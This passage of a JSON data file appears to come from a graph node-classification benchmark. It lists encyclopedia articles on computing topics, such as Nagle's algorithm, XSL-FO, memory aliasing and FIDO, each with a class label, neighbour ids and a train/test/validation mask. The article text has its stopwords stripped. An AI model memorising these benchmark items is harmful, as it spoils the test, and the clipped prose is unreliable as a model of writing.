    "text": "Nagle's_algorithm:nagle algorithm nagle algorithm means improving efficiency tcp/ip networks reducing number packets need sent network defined john nagle working ford aerospace published 1984 request comments rfc title congestion control ip/tcp internetworks see rfc 896 rfc describes called small-packet problem application repeatedly emits data small chunks frequently 1 byte size since tcp packets 40-byte header 20 bytes tcp 20 bytes ipv4 results 41-byte packet 1 byte useful information huge overhead situation often occurs telnet sessions keypresses generate single byte data transmitted immediately worse slow links many packets transit time potentially leading congestion collapse nagle algorithm works combining number small outgoing messages sending specifically long sent packet sender received acknowledgment sender keep buffering output full packet worth output thus allowing output sent rfc defines algorithm inhibit sending new tcp segments new outgoing data arrives user previously transmitted data connection remains unacknowledged mss maximum segment size largest segment sent connection window size currently acceptable window unacknowledged data written pseudocode algorithm interacts badly tcp delayed acknowledgments delayed ack feature introduced tcp roughly time early 1980s different group algorithms enabled applications two successive writes tcp connection followed read fulfilled data second write reached destination experience constant delay 500 milliseconds ack delay reason tcp implementations usually provide applications interface disable nagle algorithm typically called codice_1 option solution recommended nagle avoid algorithm sending premature packets buffering application writes flushing buffer user-level solution avoid write-write-read sequences sockets write-read-write-read fine write-write-write fine write-write-read killer buffer little writes tcp send using standard unix i/o package flushing write read usually works nagle considers delayed acks bad idea since application layer usually respond within time window protocol level recommends disabling delayed ack example codice_2 linux instead algorithm quick acks incur much overhead many small packets algorithm applies data size data single write spans 2 n packets last packet withheld waiting ack previous packet request-response application protocols request data larger packet artificially impose hundred milliseconds latency requester responder even requester properly buffered request data nagle algorithm disabled requester case response data larger packet responder also disable nagle algorithm requester promptly receive whole response general since nagle algorithm defense careless applications benefit carefully written application takes proper care buffering algorithm either effect negative effect application applications expect real-time responses low latency react poorly nagle algorithm applications networked multiplayer video games movement mouse remotely controlled operating system expect actions sent immediately algorithm purposefully delays transmission increasing bandwidth efficiency expense latency reason applications low-bandwidth time-sensitive transmissions typically use codice_1 bypass nagle delay another option use udp instead modern operating systems implement nagle algorithms aix linux enabled default disabled per-socket basis using codice_1 option",
    "neighbors": [
      11112,
      10924,
      3005,
      11413,
      5146,
      5469,
      3006
    ],
    "mask": "Test"
  },
  {
    "node_id": 5907,
    "label": 9,
    "text": "XSL_Formatting_Objects:xsl formatting objects xsl-fo xsl formatting objects markup language xml document formatting often used generate pdf files xsl-fo part xsl extensible stylesheet language set w3c technologies designed transformation formatting xml data parts xsl xslt xpath version 1.1 xsl-fo published 2006 xsl-fo considered feature complete w3c last update working draft january 2012 working group closed november 2013 unlike combination html css xsl-fo unified presentational language semantic markup term used html unlike css modifies default presentation external xml html document stores document data within general idea behind xsl-fo use user writes document fo xml language xhtml docbook tei possible examples user obtains xslt transform either writing one finding one document type question xslt transform converts xml xsl-fo xsl-fo document generated passed application called fo processor fo processors convert xsl-fo document something readable printable common output xsl-fo pdf file postscript fo processors output formats like rtf files even window user gui displaying sequence pages contents xslt language originally conceived purpose widespread use general xml transformations transformation step taken much granted xsl-fo uncommon people call xslt turns xml xsl-fo actual xsl-fo document even tutorials xsl-fo tend written xslt commands around fo processing instructions xslt transformation step exceptionally powerful allows automatic generation table contents linked references index various possibilities xsl-fo document like pdf postscript document definitively describe layout text various pages instead describes pages look like various contents go fo processor determines position text within boundaries described fo document xsl-fo specification even allows different fo processors varying responses regard resultant generated pages example fo processors hyphenate words minimize space breaking line others choose different processors may even use different hyphenation algorithms ranging simple complex hyphenation algorithms take account whether previous next line also hyphenated change borderline cases quite substantially layout various pages cases xsl-fo specification explicitly allows fo processors degree choice regard layout differentiation fo processors creating inconsistent results processors often concern general purpose behind xsl-fo generate paged printed media xsl-fo documents usually used intermediaries mostly generate either pdf files printed document final form distributed opposed html generated distributed final form directly user distributing final pdf rather formatting language input whether html/css xsl-fo means one hand recipients n't affected unpredictability resulting differences among formatting language interpreters hand means document easily adapt different recipient needs different page size preferred font size tailoring on-screen versus on-paper versus audio presentation xsl-fo language designed paged media concept pages integral part xsl-fo structure fo works best could called content-driven design standard method layout books articles legal documents forth involves single flowing span fairly contiguous text various repeating information built margins page opposed layout-driven design used newspapers magazines content documents fit required space trimmed away fit xsl-fo easily handle tight restrictions magazine layout indeed many cases lacks ability express forms said layout despite basic nature language design capable great deal expressiveness tables lists side floats variety features available features comparable css layout features though features expected built xslt xsl-fo documents xml documents conform dtd schema instead conform syntax defined xsl-fo specification xsl-fo documents contain two required sections first section details list named page layouts second section list document data markup uses various page layouts determine content fills various pages page layouts define properties page define directions flow text match conventions language question define size page well margins page importantly define sequences pages allow effects odd even pages look different example one define page layout sequence gives extra space inner margins printing purposes allows space given margin book bound document data portion broken sequence flows flow attached page layout flows contain list blocks turn contain list text data inline markup elements combination two content may also added margins document page numbers chapter headings like blocks inline elements function much way css though rules padding margins differ fo css direction relative page orientation progression blocks inlines fully specified thus allowing fo documents function languages read different english language fo specification unlike css 2.1 uses direction-neutral terms like start end rather left right describing directions xsl-fo basic content markup derived css cascading rules many attributes xsl-fo propagate child elements unless explicitly overridden xsl-fo capable great deal textual layout functionality addition information specified xsl-fo language allows specification following page defined multiple columns case blocks flow one column next default individual blocks set span columns creating textual break page columns break flow columns break text allowed flow section section nature xsl-fo page specification multiple pages may actually different numbers widths columns text flow 3 column page 5 column page 1 column page quite easily fo features work within restrictions multi-column page span multiple columns specifying two attributes i.e.. span padding-after xsl-fo list essentially two sets blocks stacked side side entry consists block left start inline direction block sequence right end inline direction block left conceptually would number bullet list however could easily string text one might see glossary entry block right works expected blocks block containers multiple blocks single list entry numbering xsl-fo lists numbered expected done xslt whatever process generated xsl-fo document number lists explicitly numbered xsl-fo user specify widow orphan blocks flow allow attributes cascade child blocks additionally blocks specified kept together single page example image block description image set never separated fo processor best adhere commands even requires creating great deal empty space page user create footnotes appear bottom page footnote written fo document regular flow text point referenced reference represented inline definition though required body one blocks placed fo processor bottom page fo processor guarantees wherever reference footnote cited reference begin page even means creating extra empty space page fo table functions much like html/css table user specifies rows data individual cell user also specify styling information column background color additionally user specify first row table header row separate styling information fo processor told exactly much space give column told auto-fit text table fo extensive controls orienting blocks text one middle page designate block text oriented different orientation oriented blocks used languages different orientation rest document simply one needs orient text layout purposes blocks contain virtually kind content tables lists even blocks reoriented text version 1.1 xsl-fo adds number new features version 1.0 xsl-fo 1.0 fairly restrictive text allowed go areas page version 1.1 loosens restrictions significantly allowing flowing text mapped multiple explicit regions page allows newspaper-like typesetting many output formats xsl-fo processors specifically pdf bookmarking features allow format specify string text separate window selected user selected document window scrolls immediately specific region document xsl-fo v1.1 provides ability create named bookmarks xsl-fo thus allowing processor pass output format supports xsl-fo 1.1 features support generation index might found back book done referencing properly marked-up elements fo document last page generated without providing explicit in-document reference specific anchor fo document definition last page restricted within specific set pages cover entire document allows user specify something like page 2 15 page 15 page number last page definition table markers allow user create dynamic content within table headers footers running totals bottom page table table continued indicators xsl-fo 1.1 adds keywords inside outside side floats makes possible achieve page layouts marginalia positioned outside inside edges pages inside refers side page towards book binding outside refers side page away book binding xsl-fo 1.1 refines functionality sizing graphics fit ability shrink fit grow fit well ability define specific scaling steps addition resulting scaling factor referenced display example say figure caption image shown 50 actual size trying decide whether xsl-fo work given document following typographic layout requirements usually indicate xsl-fo work although may satisfied proprietary extensions xml html standards css standard since css2 paged media module starts supply basic features printed media css paged media module level 3 w3c completing formulation integrated standard document formatting generate pdfs since 2013 css3-paged w3c proposal xsl-fo replacement software products like prince antenna house formatter demonstrated comparable quality xsl-fo using css pdf production design notes version 2.0 xsl formatting objects first published 2009 last updated 2012",
    "neighbors": [
      11650,
      8070,
      7943,
      10910,
      7455,
      4768,
      10791,
      8627,
      8628,
      3921,
      8923,
      479,
      6629,
      5869,
      10611,
      4213,
      502,
      6775,
      2296,
      10486,
      124,
      7422
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5908,
    "label": 3,
    "text": "Joint_Interoperability_of_Tactical_Command_and_Control_Systems:joint interoperability tactical command control systems joint interoperability tactical command control systems jintaccs united states military program development maintenance tactical information exchange configuration items cis operational procedures originated ensure command control c2 c3 weapons systems us military services nato forces would interoperable made standard message text formats mtf man-readable machine-processable information core set common warfighting symbols data link standards called tactical data links tdls",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 5909,
    "label": 9,
    "text": "Keykit:keykit keykit graphical environment programming language midi synthesis algorithmic composition originally developed tim thompson released tim thompson software engineer originator various software titles including keykit stevie predecessor widely distributed popular text editor vim keykit originally named keynote developed thompson spare time worked though related actual job keynote originally released toolchest 1995 released keykit license making freely available non-commercial use keykit noteworthy versatility expressiveness complex algorithmic arrangements produced much detail sophistication required software works multiple platforms operating systems dependent peripherals sound cards specific vendor unique advantages similar music workstation products similar functionality algorithmic composition computer generated music features",
    "neighbors": [
      8262,
      6797,
      7983,
      823,
      2908
    ],
    "mask": "None"
  },
  {
    "node_id": 5910,
    "label": 8,
    "text": "IBM_WebSphere_Application_Server_Community_Edition:ibm websphere application server community edition websphere application server community edition wasce free-of-charge certified java ee 6 application server building managing java applications ibm supported distribution apache geronimo uses tomcat servlet container axis 2 web services difference apache geronimo wasce comes db2 informix database drivers better xml parser libraries xml4j xlxp contains latest patches unreleased upstream versions 30 wasce developers committers apache geronimo project ibm announced september 20 2013 wasce withdrawn marketing support withdrawn september 30 2016",
    "neighbors": [
      6850,
      10340,
      3560,
      5612,
      5677,
      7022,
      3323,
      7983,
      8539,
      1363,
      2901,
      11030,
      6651,
      5433,
      1851,
      3966
    ],
    "mask": "None"
  },
  {
    "node_id": 5911,
    "label": 9,
    "text": "Aliasing_(computing):aliasing computing computing aliasing describes situation data location memory accessed different symbolic names program thus modifying data one name implicitly modifies values associated aliased names may expected programmer result aliasing makes particularly difficult understand analyze optimize programs aliasing analysers intend make compute useful information understanding aliasing programs example implementations c programming language perform array bounds checking one exploit implementation programming language compiler computer architecture assembly language conventions achieve aliasing effects writing outside array type buffer overflow invokes undefined behaviour according c language specification however many implementations c show aliasing effects described array created stack variable laid memory directly beside array one could index outside array directly change variable changing relevant array element example int array size 2 example sake calling arr next another int variable call arr 2 i.e 3rd element would aliased adjacent memory int main possible implementations c array block contiguous memory array elements merely referenced offsets address beginning block multiplied size single element since c bounds checking indexing addressing outside array possible note aforementioned aliasing behaviour undefined behaviour implementations may leave space arrays variables stack instance align variables memory locations multiple architecture native word size c standard generally specify data laid memory iso/iec 9899:1999 section 6.2.6.1 erroneous compiler omit aliasing effects accesses fall outside bounds array another variety aliasing occur language refer one location memory one name example pointers see c example xor swap algorithm function assumes two pointers passed distinct fact equal aliases function fails common problem functions accept pointer arguments tolerance lack thereof aliasing must carefully documented particularly functions perform complex manipulations memory areas passed controlled aliasing behaviour may desirable cases aliasing behaviour specified unlike enabled memory layout c common practice fortran perl programming language specifies constructs aliasing behaviour foreach loops allows certain data structures modified directly less code example array 1 2 3 foreach element array print 2 3 4 result one wanted bypass aliasing effects one could copy contents index variable another change copy optimizers often make conservative assumptions variables presence pointers example knowing value variable codice_1 5 normally allows certain optimizations constant propagation however compiler use information assignment another variable example c codice_2 could codice_3 alias codice_1 could case assignment like codice_5 effect assignment codice_3 value x would changed well propagating information codice_1 5 statements following codice_2 would potentially wrong codice_3 indeed alias codice_1 however information pointers constant propagation process could make query like codice_1 alias codice_3 answer codice_13 propagated safely another optimization impacted aliasing code reordering compiler decides codice_1 aliased codice_3 code uses changes value codice_1 moved assignment codice_2 would improve scheduling enable loop optimizations carried enable optimizations predictable manner iso standard c programming language including newer c99 edition see section 6.5 paragraph 7 specifies illegal exceptions access memory location using pointers different types compiler may therefore assume pointers alias rule known strict aliasing rule sometimes allows impressive increases performance known break otherwise valid code several software projects intentionally violate portion c99 standard example python 2.x implement reference counting required changes basic object structs python 3 enable optimization linux kernel strict aliasing causes problems optimization inlined code cases compiled gcc option codice_18 invoked prevent unwanted optimizations could yield unexpected code term aliasing also used describe situation due either hardware design choice hardware failure one available address bits used memory selection process may design decision address bits available necessary support installed memory device failure one address bits may shorted together may forced ground logic 0 supply voltage logic 1 example assume memory design 8 locations requiring 3 address lines bits since 2 8 address bits named a2 a0 decoded select unique memory locations follows standard binary counter fashion table 8 unique combinations address bits selects different memory location however one address bit say a2 shorted ground table would modified follows case a2 always zero first four memory locations duplicated appear second four memory locations 4 7 become inaccessible change occurred different address bit decoding results would different general effect would loss single address bit cuts available memory space half resulting duplication aliasing remaining space",
    "neighbors": [
      1474,
      9794,
      8773,
      8262,
      8582,
      10407,
      655,
      5040,
      2045,
      1844,
      4884,
      8502,
      1175,
      3960,
      10261,
      10043,
      2620,
      477
    ],
    "mask": "Test"
  },
  {
    "node_id": 5912,
    "label": 2,
    "text": "Health_(Apple):health apple health health informatics mobile app announced apple inc. worldwide developers conference wwdc 2014 app included ios 8 later healthkit accompanying developer application programming interface api included ios sdk software development kit mac used software developers design applications extensibility interact health application ios release ios 8 september 2014 apple removed healthkit-compatible apps app store fix bug causing cellular touch id issues re-released healthkit release ios 8.0.2 september 26 2014 initially health criticized lack compatible third-party applications launch glucose tracking proper health data explanations sluggish app performance eventually apple fixed issues software update february 2017 several manufacturers apple sold hardware healthkit enabled july 2016 ios 10 users united states able sign organ eye tissue donor apple health app",
    "neighbors": [
      10755,
      9732,
      5647,
      7697,
      11289,
      6186,
      4139,
      6700,
      1074,
      8754,
      9784,
      8253,
      8783,
      4180,
      10838,
      1623,
      3672,
      3681,
      9826,
      8806,
      3691,
      2673,
      7292,
      2686,
      6783,
      10878,
      5784,
      1177,
      3228,
      2207,
      11430,
      2735,
      3248,
      4283,
      3772,
      7869,
      3286,
      9430,
      3293,
      4318,
      6884,
      9451,
      1772,
      7420,
      1290,
      3338,
      784,
      10512,
      4888,
      10023,
      4399,
      7983,
      7991,
      2363,
      2365,
      2366,
      9022,
      1346,
      10562,
      7496,
      4957,
      6495,
      9063,
      3948,
      10608,
      2439,
      6023,
      6539,
      7052,
      3483,
      2979,
      8109,
      2492,
      446,
      7614,
      2502,
      456,
      1482,
      7118,
      464,
      8662,
      9174,
      7133,
      9182,
      4068,
      487,
      2023,
      7154
    ],
    "mask": "None"
  },
  {
    "node_id": 5913,
    "label": 2,
    "text": "Remote_Application_Programming_Interface:remote application programming interface remote application programming interface rapi remote procedure call rpc mechanism pocket pc server pc application client words rapi allows pc applications call functions executed pocket pc rapi registry file system database configuration pocket pc device available pc application",
    "neighbors": [
      5761,
      10243,
      5765,
      10886,
      2183,
      9609,
      5259,
      9612,
      653,
      6927,
      10769,
      1043,
      9491,
      5401,
      9114,
      5119,
      10654,
      1055,
      4384,
      8607,
      9762,
      2083,
      4771,
      8227,
      2854,
      7846,
      10024,
      1577,
      10026,
      11559,
      11683,
      10414,
      4143,
      9263,
      11570,
      11316,
      1077,
      8246,
      6584,
      2493,
      1348,
      8391,
      844,
      7629,
      4174,
      4178,
      9813,
      214,
      9943,
      9434,
      603,
      2783,
      736,
      2145,
      4321,
      6114,
      4836,
      6370,
      8161,
      9441,
      10079,
      11616,
      1770,
      11498,
      9196,
      3821,
      4590,
      10991,
      2804,
      3573,
      10229,
      1656,
      9340,
      2943
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5914,
    "label": 7,
    "text": "Kynapse:kynapse kynapse artificial intelligence middleware product developed kynogon bought autodesk 2008 called autodesk kynapse 2011 re-engineered rebranded autodesk navigation kynapse used development 80 game titles including mafia ii crackdown alone dark 5 fable ii sonic hedgehog 2006 unreal engine kynapse also used companies eads bae systems électricité de france develop military industrial simulation",
    "neighbors": [
      8454,
      6311,
      8937,
      2826,
      3210,
      11306,
      6797,
      6900,
      2293,
      4182,
      823,
      9691,
      11700,
      8122,
      5083,
      1916
    ],
    "mask": "Test"
  },
  {
    "node_id": 5915,
    "label": 8,
    "text": "SOAPjr:soapjr soapjr protocol specification exchanging structured information implementation web services computer networks hybrid soap json-rpc abbreviated jr case soapjr designed create clean fast ajax-style apis analogous introduction band signalling telephony world traditional soap longer simple object access protocol initially designed bloated overly verbose making bandwidth-hungry slow also based xml making expensive parse manipulate especially mobile embedded clients however core envelope/head/body design pattern useful ajax style apis soapjr uses similar envelope/head/body model using lightweight easier manipulate json contrast soap json-rpc overly simplistic basically tunnels http get-style key/value pairs within query string using json however within json-rpc head/body separation leaving metadata pollute main data space soapjr combines best two concepts designed create modern ajax apis easily used mobile devices embedded systems desktop browsers see soapjr specs detailed description soapjr open source project software released gpl content creative commons following soapjr entities defined json-schemas latest versions also downloaded single file soapjr.org also aims contribute creation common set dmds data model definitions may align json-schema proposal service mapping description proposal applications within specific domains easily share data primary extension soapjr may provide use consistent standardised error codes resources may inform development common data models utilised within microformats rdf basic request view jcard details single user based username message would passed request within json parameter e.g simple soapjr response head.result represents success body contains single jcard record list list search context would contain array 0 jcard records",
    "neighbors": [
      9441,
      803,
      10020,
      1802,
      6127,
      10486,
      479
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5916,
    "label": 1,
    "text": "Hindu_genealogy_registers_at_Haridwar:hindu genealogy registers haridwar genealogy registers families maintained brahmin pandits priests ‘ pandas ’ double professional genealogists haridwar subject study many years several cases voluminous records vahis bahi also used settling legal cases regarding inheritance property disputes records held sacrosanct pilgrims pandas many places records trace family history twenty prior generations stretching across many centuries haridwar traditionally site death rites also shraaddha amongst hindus soon also became customary family pandits priest record visit family along gotra family tree marriages members present etc. grouped according family home town centuries registers became important genealogical source many families part splintered families tracing family tree family history well especially partition india 1947 later amongst indian diaspora custom similar panjis panji prabandh extensive genealogical records maintained among maithil brahmins bihar custom well known today indians settled abroad ancient custom detailed family genealogies hindu families past several generations kept professional hindu brahmin pandits popularly known pandas hindu holy city haridwar hand written registers passed generations pandit ancestors classified according original districts villages ones ancestors special designated pandit families charge designated district registers even cases ancestral districts villages left behind pakistan partition india hindus migrate india several cases present day descendants sikhs muslims christians uncommon one find details even one past seven generations genealogy registers kept pandas haridwar centuries hindu ancestors visited holy town haridwar purpose may mostly pilgrimage purposes or/and cremation dead immersion ashes bones kin cremation waters holy river ganges required hindu religious custom ancient custom go pandit charge ones family register update family genealogical family tree details marriages births deaths ones extended joint family present day india people visiting haridwar dumbfounded pundits blue solicit come update ancestral genealogical family tree news travels like wildfire among pandits ones family designated pandit quickly notified ones visit nowadays hindu joint family system broken people preferring nuclear families record keeping pandits prefer visitors haridwar come prepared getting touch ones extended family bringing relevant details regarding ones ancestral district village names grand parents great grand parents marriages births deaths occurred extended family even much details possible families married visiting family member required personally sign family genealogical register furnished ones family panda updating future family visitors generations see authenticate updated entries friends family members accompanying visit may also requested sign witnesses starting around 1977 hindu genealogy records microfilmed later housed genealogical society utah gsu usa since 1981 places records records hindu families kurukshetra pehowa chintpurni jawalapur haridwar jawalamukhi genealogical society utah currently restricts online access hindu genealogy records members church jesus christ latter-day saints lds church others notable places shraadhs performed pitrs noted sites became customary family pandits priest record visit family along gotra family tree marriages members present etc. grouped according family home town centuries registers became important genealogical source many families part splintered families tracing family tree family history thanesar kurukshetra traditionally site death rites also shraaddha amongst hindus genealogy records also kept pitrudhak teerth pehowa banks sarasvati river kurukshetra district haryana site hindu pilgrimage pandava performed death rites mahabharata war genealogy records pilgrims also kept jawalamukhi shakti peetha town nagar parishad kangra district indian state himachal pradesh site hindu pilgrimage genealogy records also kept chintpurni village una district himachal pradesh one shakti peethas major hindu pilgrimage site genealogy records also kept ghats varanasi ganges river major site hindu pilgrimage death rites performed especially manikarnika ghat genealogy records also kept ghats ganges prayagraj long place pilgrimage hindus spawned set priests maintain genealogy records often dating back centuries trimbakeshwar shiva temple ancient hindu temple town trimbak trimbakeshwar tehsil nashik district maharashtra india 28 km city nashik 40 km nashik road dedicated god shiva one twelve jyotirlingas genealogy records also kept purohits pandas tarakeswar shiva temple maintain genealogy records pilgrims",
    "neighbors": [],
    "mask": "Validation"
  },
  {
    "node_id": 5917,
    "label": 9,
    "text": "Map_(higher-order_function):map higher-order function many programming languages map name higher-order function applies given function element functor e.g list returning list results order often called apply-to-all considered functional form concept map limited lists works sequential containers tree-like containers even abstract containers futures promises suppose list integers codice_1 would like calculate square integer first define function codice_2 single number shown haskell square x x x afterwards may call » map square 1 2 3 4 5 yields codice_3 demonstrating codice_4 gone entire list applied function codice_2 element see view step mapping process list integers codice_6 want map new list codice_7 according function formula_1 codice_4 provided part haskell base prelude i.e standard library implemented map b b map map f x xs f x map f xs haskell polymorphic function codice_9 generalized polytypic function codice_10 applies type belonging codice_11 type class type constructor lists codice_12 defined instance codice_11 type class using codice_4 function previous example instance functor examples codice_11 instances include trees -- simple binary tree data tree leaf fork tree tree instance functor tree mapping tree yields » fmap square fork fork leaf 1 leaf 2 fork leaf 3 leaf 4 fork fork leaf 1 leaf 4 fork leaf 9 leaf 16 every instance codice_11 type class codice_17 contractually obliged obey functor laws fmap id ≡ id -- identity law fmap f g ≡ fmap f fmap g -- composition law codice_18 denotes function composition haskell among uses allows defining element-wise operations various kinds collections moreover two functors natural transformation function polymorphic type formula_2 respects function defined parametric polymorphism type definition specification always satisfied mathematical basis maps allow number optimizations composition law ensures lead result formula_5 however second form efficient compute first form codice_4 requires rebuilding entire list scratch therefore compilers attempt transform first form second type optimization known map fusion functional analog loop fusion map functions often defined terms fold codice_22 means one map-fold fusion codice_23 equivalent codice_24 implementation map singly linked lists tail-recursive may build lot frames stack called large list many languages alternately provide reverse map function equivalent reversing mapped list tail-recursive implementation utilizes fold-left function reversemap f foldl \\ys x f x ys since reversing singly linked list also tail-recursive reverse reverse-map composed perform normal map tail-recursive way map function originated functional programming languages language lisp introduced map function called codice_25 1959 slightly different versions already appearing 1958 original definition codice_25 mapping function successive rest lists function codice_25 still available newer lisps like common lisp though functions like codice_28 generic codice_4 would preferred squaring elements list using codice_25 would written s-expression notation like using function codice_28 example would written like today mapping functions supported may defined many procedural object-oriented multi-paradigm languages well c++ standard template library called codice_32 c 3.0 linq library provided extension method called codice_33 map also frequently used operation high level languages coldfusion markup language cfml perl python ruby operation called codice_4 four languages codice_35 alias codice_4 also provided ruby smalltalk common lisp provides family map-like functions one corresponding behavior described called codice_28 codice_38 indicating access using car operation also languages syntactic constructs providing functionality map function map sometimes generalized accept dyadic 2-argument functions apply user-supplied function corresponding elements two lists languages use special names map2 zipwith languages using explicit variadic functions may versions map variable arity support variable-arity functions map 2 lists encounters issue handling lists different lengths various languages differ raise exception stop length shortest list ignore extra items lists continue length longest list lists already ended pass placeholder value function indicating value languages support first-class functions codice_4 may partially applied lift function works one value element-wise equivalent works entire container example codice_40 haskell function squares element list",
    "neighbors": [
      3076,
      3462,
      8582,
      1931,
      2062,
      3733,
      8854,
      5783,
      4507,
      155,
      9245,
      3876,
      5031,
      3370,
      5165,
      5677,
      8116,
      11574,
      6074,
      9914,
      6718,
      8644,
      8262,
      5833,
      8397,
      11343,
      7889,
      2519,
      10083,
      9828,
      7805,
      6502,
      8421,
      2666,
      8554,
      2670,
      623,
      7662,
      6775,
      3705,
      7292,
      2557
    ],
    "mask": "None"
  },
  {
    "node_id": 5918,
    "label": 4,
    "text": "FIDO_Alliance:fido alliance fido fast identity online alliance open industry association launched february 2013 whose mission develop promote authentication standards help reduce world ’ over-reliance passwords fido addresses lack interoperability among strong authentication devices reduces problems users face creating remembering multiple usernames passwords fido supports full range authentication technologies including biometrics fingerprint iris scanners voice facial recognition well existing solutions communications standards trusted platform modules tpm usb security tokens embedded secure elements ese smart cards near field communication nfc usb security token device may used authenticate using simple password e.g four-digit pin pressing button specifications emphasize device-centric model authentication wire happens using public-key cryptography user device registers user server registering public key authenticate user device signs challenge server using private key holds keys device unlocked local user gesture biometric pressing button fido provides two types user experiences depending protocol used protocols define common interface client whatever local authentication method user exercises nok nok labs paypal lenovo among fido founders end september 2016 fido members totaled 260 including board made aetna alibaba group amazon american express arm bank america bc card broadcom crucialtec daon egis technology feitian gemalto google hypr infineon intel ing lenovo mastercard microsoft nok nok labs ntt docomo nxp semiconductors oberthur technologies paypal qualcomm rsa samsung electronics synaptics usaa visa vmware onespan yubico full list members available official website following open specifications may obtained fido web site u2f 1.0 proposed standard october 9 2014 starting point short-lived specification known fido 2.0 proposed standard september 4 2015 latter formally submitted world wide web consortium w3c november 12 2015 subsequently first working draft w3c web authentication webauthn standard published may 31 2016 webauthn standard revised numerous times since becoming w3c recommendation march 4 2019 meanwhile u2f 1.2 proposed standard july 11 2017 became starting point client authenticator protocol 2.0 proposed standard published september 27 2017 fido ctap 2.0 complements w3c webauthn scope fido2 project",
    "neighbors": [
      7936,
      9863,
      6153,
      9745,
      1054,
      6316,
      1069,
      7212,
      10801,
      5433,
      7354,
      10566,
      3271,
      11336,
      6222,
      3026,
      8921,
      10207,
      8674,
      4965,
      2154,
      124
    ],
    "mask": "Test"
  },
  {
    "node_id": 5919,
    "label": 1,
    "text": "Quicklaw:quicklaw lexisnexis quicklaw canadian electronic legal research database provides court decisions levels news reports provincial federal statutes journals legal commentary also offers case citator case digests 2002 quicklaw purchased lexisnexis subsidiary lexisnexis canada lexisnexis quicklaw used lawyers law firms canada access case law legislation exclusive current awareness services expert commentary addition research lexisnexis quicklaw service also includes citation tools help lawyers law firms validate authority cases find summaries judicial considerations along treatment pinpoint references lexisnexis quicklaw composed several products providing legal practitioners access need perform research designed practices focus particular legal segments lexisnexis quicklaw essentials provides content needed research areas westlaw/ecarswell offers similar fee-based services canlii.org non-profit organization managed federation law societies canada canlii goal make canadian law accessible free internet website provides access court judgments tribunal decisions statutes regulations canadian jurisdictions canlii part collaboration legal information institute around world include austlii bailii lii etc",
    "neighbors": [
      6123
    ],
    "mask": "Train"
  },
  {
    "node_id": 5920,
    "label": 9,
    "text": "F*_(programming_language):f* programming language f* pronounced f star functional programming language inspired ml aimed program verification type system includes dependent types monadic effects refinement types allows expressing precise specifications programs including functional correctness security properties f* type-checker aims prove programs meet specifications using combination smt solving manual proofs programs written f* translated ocaml f c execution previous versions f* could also translated javascript latest version f* written entirely common subset f* f bootstraps ocaml f open source apache 2.0 license active development github",
    "neighbors": [
      9345,
      5796,
      3462,
      8262,
      4791,
      10571,
      5612,
      7482,
      7983,
      11221,
      2358,
      823,
      7386,
      2140,
      2045
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5921,
    "label": 9,
    "text": "Bridging_(programming):bridging programming computer science bridging describes systems map runtime behaviour different programming languages share common resources often used allow foreign languages operate host platform native object libraries translating data state across two sides bridge bridging contrasts embedding systems allow limited interaction black box mechanism state sharing limited non-existent apple inc. made heavy use bridging several occasions notably early versions mac os x bridged older classic systems using carbon system well java microsoft common language runtime introduced .net framework designed multi-language start avoided need extensive bridging solutions platforms recently added new bridging systems javascript apple objc-to-js microsoft html bridge programming languages include concept subroutine function mechanism allows commonly used code encapsulated re-used throughout program instance program makes heavy use mathematics might need perform square root calculation various numbers throughout program code might isolated codice_1 function passed number perform square root calculation returns result many cases code question already exists either implemented hardware part underlying operating system program runs within cases codice_2 function simplified calling built-in code functions often fall easily identifiable groups similar capabilities mathematics functions instance handling text files functions often gathered together collections known libraries supplied system commonly past programming language language method calling functions libraries written one language may work another semantics calling functions c different pascal generally c programs call pascal libraries vice versa commonly used solution problem pick one set call semantics default system platform programming languages conform standard computer languages platforms generally added functionality expressed call/return model function garbage collection instance runs throughout lifetime application run sort functionality effectively outside program present expressed directly program functions like generally implemented ever-growing runtime systems libraries compiled programs necessarily visible within code introduction shared library systems changed model conventional program construction considerably past library code copied directly programs linker effectively became part program dynamic linking library code normally exists one place vendor-provided file system applications share aryl systems presented many problems often performance terms shared libraries largely isolated particular languages platforms opposed operating system whole many problems addressed 1990s early 2000s major platforms switched shared libraries primary interface entire system although systems addressed problem providing common code libraries new applications systems generally added runtimes well meant language library entire system often tightly linked together instance openstep entire operating system effect objective-c program programs running wished use extensive object suite provided openstep would able call libraries using obj-c semantics also interact obj-c runtime provide basic control application contrast microsoft .net framework designed start able support multiple languages initially c c++ new version visual basic ms isolated object libraries runtime common language infrastructure cli instead programs compiling directly source code underlying runtime format case languages cli model languages first compiled common intermediate language cil calls common language runtime clr theory programming language use cli system use .net objects although platforms like osx .net offer ability programming languages adapted platform runtime system also case programming languages often target runtime mind objective-c essentially requires obj-c runtime c clr one wants use c code within obj-c vice versa one find version written use runtime often n't exist common version problem concerns use languages platform independent like java runtimes libraries although possible build java compiler calls underlying system like j system would also able interact java code unless re-compiled access code java libraries may difficult impossible rise web browser sort virtual operating system made problem acute modern programming paradigm html5 includes javascript js language document object model major library browser runtime environment although would possible build version js runs clr would largely defeat purpose language designed largely operating browsers unless compiler interact browser directly little purpose using cases many like need arises system allows two runtimes interoperate known bridging runtimes apple made considerable use bridging technologies since earliest efforts led mac os x next first purchased apple plan build new version openstep then-known rhapsody emulator known blue box would run classic mac os programs led considerable push-back developer community rhapsody cancelled place os x would implement many older mac os calls top core functionality openstep providing path existing applications gracefully migrated forward apple took useful code openstep platform re-implemented core functionality pure-c library known core foundation cf short openstep libraries calling cf underlying code became cocoa api new mac-like c libraries became carbon api c obj-c sides system needed share data data obj-c side normally stored objects opposed base types conversions cf could expensive apple willing pay performance penalty implemented scheme known toll-free bridging help reduce eliminate problem time java becoming major player programming world apple also provided java bridging solution developed webobjects platform classical bridging solution direct conversions java openstep/cf types completed code required carbon program using cfstrings using code cocoa application using nsstring two could bridged toll-free java bridge cfstrings instead cast java string objects required work made porting essentially invisible developers made widespread use similar technologies provide support languages including peering system used allow obj-c code call .net code mono need porting solutions waned carbon java bridge deprecated eventually removed later releases system java support migrated using java native interface jni standard java world allowed java interact c-based code osx jni allowed obj-c code used difficulty around 2012 apple extensive work webkit led introduction new bridging technology allows javascript program code call obj-c/cocoa runtime vice versa allows browser automation using obj-c alternately automation cocoa applications using javascript originally part safari web browser 2013 code promoted part new osx 10.9 although examples bridging used past microsoft cli system intended support languages top .net system rather running native runtimes bridging led number new languages implemented cli system often including either hash mark iron name see 